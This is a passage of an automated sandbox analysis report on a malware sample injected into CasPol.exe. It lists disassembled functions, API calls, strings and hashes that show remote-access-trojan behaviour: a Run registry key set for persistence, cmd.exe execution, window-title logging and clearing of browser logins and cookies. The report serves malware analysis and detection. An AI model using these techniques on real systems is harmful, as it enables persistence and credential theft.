                                                                                                              APIs
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0044AAC9
                                                                                                              • GetLastError.KERNEL32(?,0044A991,`@,0046DD28,0000000C), ref: 0044AAD3
                                                                                                              • __dosmaperr.LIBCMT ref: 0044AAFE
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                              • String ID: `@
                                                                                                              • API String ID: 2583163307-951712118
                                                                                                              • Opcode ID: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                              • Instruction ID: 1bd3c876d7044edfb1a6812000b34c32b622226010ed5631802de8abdb52b33d
                                                                                                              • Opcode Fuzzy Hash: e5cf9cf0863519c22c59f520a66439faf8bffb0939932f5db486048d3d382d3d
                                                                                                              • Instruction Fuzzy Hash: F8018E366446201AF7206674698577F77898B82738F2A027FF904972D2DE6DCCC5C19F
                                                                                                              Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetLocalTime.KERNEL32(?), ref: 00404946
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00404B1D,?,00000000,00000000), ref: 004049A7
                                                                                                              Strings
                                                                                                              • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Create$EventLocalThreadTime
                                                                                                              • String ID: KeepAlive | Enabled | Timeout:
                                                                                                              • API String ID: 2532271599-1507639952
                                                                                                              • Opcode ID: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                              • Instruction ID: c7daaf492e0cec12b0841424890a61be8e5b61f5a3177df3d8f4b9063cedc03f
                                                                                                              • Opcode Fuzzy Hash: 039a83a3673151248ce1c058b5ed99207d7e0ff837a33c13ebd59ef1524b6346
                                                                                                              • Instruction Fuzzy Hash: 38113AB19042547AC710A7BA8C49BCB7F9C9F86364F00407BF40462192C7789845CBFA
                                                                                                              Function 00404B29 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47synchronizationCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00404B26), ref: 00404B40
                                                                                                              • CloseHandle.KERNEL32(?), ref: 00404B98
                                                                                                              • SetEvent.KERNEL32(?,?,?,?,00404B26), ref: 00404BA7
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseEventHandleObjectSingleWait
                                                                                                              • String ID: Connection Timeout
                                                                                                              • API String ID: 2055531096-499159329
                                                                                                              • Opcode ID: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                              • Instruction ID: ea4abd021a31a941d528121f8d879e106695b0b6a7a7fd2d86c7f06b9a048df4
                                                                                                              • Opcode Fuzzy Hash: a97e81c914b9350505812461b63a63b2fd2cd8a093a8b12f04dedae0d79932b3
                                                                                                              • Instruction Fuzzy Hash: 7A01F5B1940B41AFD325BB3A9C4645ABBE4AB45315700053FF6D392BB1DA38E8408B5A
                                                                                                              Function 00412774 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041277F
                                                                                                              • RegSetValueExW.ADVAPI32 ref: 004127AD
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 004127B8
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041277D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValue
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                              • API String ID: 1818849710-1051519024
                                                                                                              • Opcode ID: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                              • Instruction ID: fff2d7bcc465bc574364a4979b4b77ba115ffea085319746951fe37a0eeb78e5
                                                                                                              • Opcode Fuzzy Hash: f3f4d92ea395f83514c7fc898d5ccc6e166341d4c45edfed3dd661c905dadffd
                                                                                                              • Instruction Fuzzy Hash: 9FF0CD31500218BBDF109FA0ED46EEF37ACAB40B50F104539F902A60A1E675DB14DAA4
                                                                                                              Function 0040CDBE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040CDC9
                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CE08
                                                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 004347DC
                                                                                                                • Part of subcall function 004347BD: _Yarn.LIBCPMT ref: 00434800
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CE2C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                                                                                              • String ID: bad locale name
                                                                                                              • API String ID: 3628047217-1405518554
                                                                                                              • Opcode ID: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                                                              • Instruction ID: 69d9b4558c1556c2c918d31b5ea24064f6fee533cc814fb99c42b36f0b05f267
                                                                                                              • Opcode Fuzzy Hash: 07a2f8cd9595a8075203c453c032e2fb497ed10d9d6fcf4fa69d5ee2e3489bdb
                                                                                                              • Instruction Fuzzy Hash: 1AF08171400204EAC724FB23D853ACA73A49F54748F90497FB506214D2EF38A618CA8C
                                                                                                              Function 004126D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                              • RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000), ref: 00412709
                                                                                                              • RegCloseKey.ADVAPI32(004655B0), ref: 00412714
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValue
                                                                                                              • String ID: Control Panel\Desktop
                                                                                                              • API String ID: 1818849710-27424756
                                                                                                              • Opcode ID: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                              • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                              • Opcode Fuzzy Hash: 3aedce82be745f7a8d31741b6ddf3b86529f340df0cdc46c1cf573c60441b443
                                                                                                              • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                              Function 004127D5 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                              • RegSetValueExA.ADVAPI32(TUF,000000AF,00000000,00000004,00000001,00000004), ref: 004127FE
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00412809
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateValue
                                                                                                              • String ID: TUF
                                                                                                              • API String ID: 1818849710-3431404234
                                                                                                              • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                              • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                              • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                              • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                              Function 004151B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004151F4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExecuteShell
                                                                                                              • String ID: /C $cmd.exe$open
                                                                                                              • API String ID: 587946157-3896048727
                                                                                                              • Opcode ID: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                              • Instruction ID: 3ae8c2b06d9b1922b9065f49b1512f2a4b1b87a12dccb2265ed1bd098505db2c
                                                                                                              • Opcode Fuzzy Hash: b29912c7ec69b7e063321f84cff0ad8ed8559f61d9423d2534ea1fccbc267807
                                                                                                              • Instruction Fuzzy Hash: D8E030701043006AC708FB61DC95C7F77AC9A80708F10083EB542A21E2EF3CA949C65E
                                                                                                              Function 00401430 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 0040143A
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00401441
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: GetCursorInfo$User32.dll
                                                                                                              • API String ID: 1646373207-2714051624
                                                                                                              • Opcode ID: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                              • Instruction ID: fea3bfcfa5ad703f85b7dd8d5f3eac54d033561bc9bd2fc33d3800e380b32b62
                                                                                                              • Opcode Fuzzy Hash: f39e1638c21b7beb4c7105e5daed03b820dcbd0345c10e5d325762a4e30a7452
                                                                                                              • Instruction Fuzzy Hash: 51B092B868A3059BC7306BE0BD0EA093B24EA44703B1000B2F087C12A1EB7880809A6E
                                                                                                              Function 004014D5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • LoadLibraryA.KERNEL32(User32.dll), ref: 004014DF
                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 004014E6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryLoadProc
                                                                                                              • String ID: GetLastInputInfo$User32.dll
                                                                                                              • API String ID: 2574300362-1519888992
                                                                                                              • Opcode ID: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                              • Instruction ID: 425bdc246283df71b7ad83aa0519e38d385401eab2b134f4ae8d574857069069
                                                                                                              • Opcode Fuzzy Hash: 3fc7b1db73b7af1b2a271cc819159fe1e403f0356e3f7920f37c5b1d7d3a7c56
                                                                                                              • Instruction Fuzzy Hash: D7B092B85843849BC7202BE0BC0DA297BA4FA48B43720447AF406D11A1EB7881809F6F
                                                                                                              Function 00448D0B Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: __alldvrm$_strrchr
                                                                                                              • String ID:
                                                                                                              • API String ID: 1036877536-0
                                                                                                              • Opcode ID: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                              • Instruction ID: 63a095292c52d92af2bf19a392fdfa9b0d117a80b68c781492b1ecdde0b53e6f
                                                                                                              • Opcode Fuzzy Hash: fd79a7ba97117714d85021eba27869df20238d29c0b4b296cd839071043617be
                                                                                                              • Instruction Fuzzy Hash: 60A168729042469FFB21CF58C8817AEBBE2EF55314F24416FE5849B382DA3C8D45C759
                                                                                                              Function 00441A81 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                              • Instruction ID: 90b3d0a8f148eb65ba096d855dd205fb67a40d318d5acb0a54968c3478788488
                                                                                                              • Opcode Fuzzy Hash: 9b4993e58d5b3b7c0490c3bd99df1984d1f8f515a64746adb67fb48e1b339b7f
                                                                                                              • Instruction Fuzzy Hash: 10412B71A00744AFF724AF78CC41B6ABBE8EF88714F10452FF511DB291E679A9458788
                                                                                                              Function 00404688 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                              • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,?,?,00000000), ref: 00404797
                                                                                                              • CloseHandle.KERNEL32(?), ref: 004047A0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                              • String ID:
                                                                                                              • API String ID: 3360349984-0
                                                                                                              • Opcode ID: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                              • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                              • Opcode Fuzzy Hash: e7efdc3c20157fe016eb29e5a130d6f8c33beeccd37b3f6c9988191ed4582187
                                                                                                              • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                              Function 0040B806 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              • Cleared browsers logins and cookies., xrefs: 0040B8EF
                                                                                                              • [Cleared browsers logins and cookies.], xrefs: 0040B8DE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                                                                                              • API String ID: 3472027048-1236744412
                                                                                                              • Opcode ID: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                              • Instruction ID: 8ec9c8031b8ac0664cfb8a22ca307bf710261ddd843e88104a77dac6ce00e7b7
                                                                                                              • Opcode Fuzzy Hash: c1d9957bbb0b6ffbc53675b18bda7a9e9a83474d3c872a81f0d626b3d463543d
                                                                                                              • Instruction Fuzzy Hash: FA31891564C3816ACA11777514167EB6F958A93754F0884BFF8C4273E3DB7A480893EF
                                                                                                              Function 00411524 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041265D: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?), ref: 00412679
                                                                                                                • Part of subcall function 0041265D: RegQueryValueExA.ADVAPI32 ref: 00412692
                                                                                                                • Part of subcall function 0041265D: RegCloseKey.ADVAPI32(?), ref: 0041269D
                                                                                                              • Sleep.KERNEL32(00000BB8), ref: 004115C3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQuerySleepValue
                                                                                                              • String ID: @CG$exepath$BG
                                                                                                              • API String ID: 4119054056-3221201242
                                                                                                              • Opcode ID: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                              • Instruction ID: 48aadeccb903c06d46a934e3c92f1fe58b0119fffb77d403c20537554d94cb98
                                                                                                              • Opcode Fuzzy Hash: bf5574a8b4d2f3dae16cf885c7a16fb18bb29924f8325a853eaea5d7e5cb2135
                                                                                                              • Instruction Fuzzy Hash: C721F4A0B002042BD614B77A6C06ABF724E8BD1308F00457FBD4AA72D3DE7D9D4581AD
                                                                                                              Function 00409C4B Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 0041B6E6: GetForegroundWindow.USER32 ref: 0041B6F6
                                                                                                                • Part of subcall function 0041B6E6: GetWindowTextLengthW.USER32(00000000), ref: 0041B6FF
                                                                                                                • Part of subcall function 0041B6E6: GetWindowTextW.USER32(00000000,00000000,00000001,00000001,00000000), ref: 0041B729
                                                                                                              • Sleep.KERNEL32(000001F4), ref: 00409C95
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00409D1F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Window$SleepText$ForegroundLength
                                                                                                              • String ID: [ $ ]
                                                                                                              • API String ID: 3309952895-93608704
                                                                                                              • Opcode ID: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                              • Instruction ID: a5f4dc9a3e016f43683dc3f70dfd76a68f9d753ffdb665cb1c6be196efeb7d0c
                                                                                                              • Opcode Fuzzy Hash: f97a645a0d2da22bcac442ef33f0edb303259d95a1ef08cf99aa338e08c2de75
                                                                                                              • Instruction Fuzzy Hash: 4611C0325082005BD218FB25DC17AAEB7A8AF51708F40047FF542221E3EF39AE1986DF
                                                                                                              Function 0041B58F Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000), ref: 0041B5CE
                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041B6A5,00000000,00000000), ref: 0041B5EB
                                                                                                              • WriteFile.KERNEL32(00000000,00000000,00000000,004061FD,00000000), ref: 0041B5FF
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B60C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandlePointerWrite
                                                                                                              • String ID:
                                                                                                              • API String ID: 3604237281-0
                                                                                                              • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                              • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                              • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                              • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                              Function 00442CD2 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                              • Instruction ID: c84c011be516b9a55b4d27d1f6be1bd7d35570b7e88518a67a440710abbdd315
                                                                                                              • Opcode Fuzzy Hash: 18f7b12d8fbd203e6fe2bd4c4423912ade4cd6e2ab417617722edd39325a2eb9
                                                                                                              • Instruction Fuzzy Hash: 780126F26097153EF62016796CC1F6B230CDF823B8B34073BF421652E1EAA8CC01506C
                                                                                                              Function 00442D51 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                              • Instruction ID: e6f180ecc181abb5a77ec057abe27f8575e00a75e8bcf6cd4df5c03139e47140
                                                                                                              • Opcode Fuzzy Hash: 8aedf970bdaeb9d9c72bc659829c2e19759f544123fe9e87a80c2ba2346fca48
                                                                                                              • Instruction Fuzzy Hash: E10121F2A092163EB62016797DD0DA7260DDF823B8374033BF421722D2EAA88C004068
                                                                                                              Function 004380F5 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___BuildCatchObject.LIBVCRUNTIME ref: 0043810F
                                                                                                                • Part of subcall function 0043805C: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0043808B
                                                                                                                • Part of subcall function 0043805C: ___AdjustPointer.LIBCMT ref: 004380A6
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 00438124
                                                                                                              • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00438135
                                                                                                              • CallCatchBlock.LIBVCRUNTIME ref: 0043815D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                              • String ID:
                                                                                                              • API String ID: 737400349-0
                                                                                                              • Opcode ID: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                              • Instruction ID: 9a8277e88b86f5caaa8344fd0510e130f37262ecddc885b6c63592dc4fca678f
                                                                                                              • Opcode Fuzzy Hash: c8370f5f766c88f9b882548d03e746073a9763e8d7037f7b78bb80a5d64990c6
                                                                                                              • Instruction Fuzzy Hash: 09014032100208BBDF126E96CC45DEB7B69EF4C758F04500DFE4866121C739E861DBA8
                                                                                                              Function 0041B61A Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041B633
                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B647
                                                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0041B66C
                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0041B67A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: File$CloseCreateHandleReadSize
                                                                                                              • String ID:
                                                                                                              • API String ID: 3919263394-0
                                                                                                              • Opcode ID: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                              • Instruction ID: 0a6fce4b3becde4f67ebc64a516323d43c368a538d14007d95c0a1c89629aad3
                                                                                                              • Opcode Fuzzy Hash: 5b639659936e0bf80293aa969ecd5facc1abbd81689efef7b5bf737102e1771e
                                                                                                              • Instruction Fuzzy Hash: B3F0F6B12053047FE6101B25FC85FBF375CDB867A5F00023EFC01A22D1DA658C459179
                                                                                                              Function 0041850C Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetSystemMetrics.USER32(0000004C,?,?,?,?,?,004185D2,?,?), ref: 00418519
                                                                                                              • GetSystemMetrics.USER32(0000004D,?,?,?,?,?,004185D2,?,?), ref: 0041851F
